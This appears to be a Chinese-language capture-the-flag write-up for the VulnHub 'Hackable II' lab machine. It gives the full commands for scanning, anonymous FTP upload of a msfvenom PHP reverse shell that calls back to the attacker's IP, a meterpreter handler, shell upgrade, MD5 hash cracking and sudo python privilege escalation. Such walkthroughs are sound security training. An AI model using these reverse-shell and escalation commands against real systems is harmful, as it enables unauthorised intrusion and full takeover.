『vulnhub系列』HACKABLE-II

『vulnhub系列』HACKABLE-II

下载地址：

https://www.vulnhub.com/entry/hackable-ii,711/

信息搜集：

使用nmap探测存活主机，发现主机开启了21,22和80端口

访问80端口的web服务，发现apache默认页面

使用dirsearch进行目录爆破，发现files 目录

dirsearch -u "http://192.168.199.135/"

访问files 页面发现CALL.html

访问CALL.html发现只有一段话

这条路的线索暂时断了，我们使用匿名登录ftp，发现CALL.html

ftp 192.168.199.135
#使用anonymous登录，密码为空

get之后发现就是我们刚刚在files中发现的CALL.html

漏洞利用：

此时我们上传反弹shell（使用msfvenom生成）

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.199.129 lport=4444 -o re_shell.php
#生成反弹shell
put re_shell.php
#上传反弹shell

进入files文件，发现我们刚刚上传的re_shell.php

我们使用msfconsole进行监听

msfconsole
use exploit/multi/handler
set lhost 192.168.199.129
set payload php/meterpreter/reverse_tcp
run

开启监听后，访问re_shell.php ，反弹成功

进入shell，使用python开启交互式shell

python3 -c "import pty;pty.spawn('/bin/bash')"

提升权限：

我们在/home中发现了important.txt ，读取发现“运行脚本发现数据”

读取/.runme.sh 发现secret key trolled 还有下面的shrek:cf4c2232354952690368f1b3dfdfb24d

使用md5解密得到密码onion

切换sherk，使用密码onion，登陆成功

获得user.txt

使用sudo -l 查看当前用户可以以root权限执行的命令，发现python命令可以以root权限提权

此时我们使用python 进行提权,成功

sudo python3.5 -c 'import os;os.system("/bin/bash");'

得到root.txt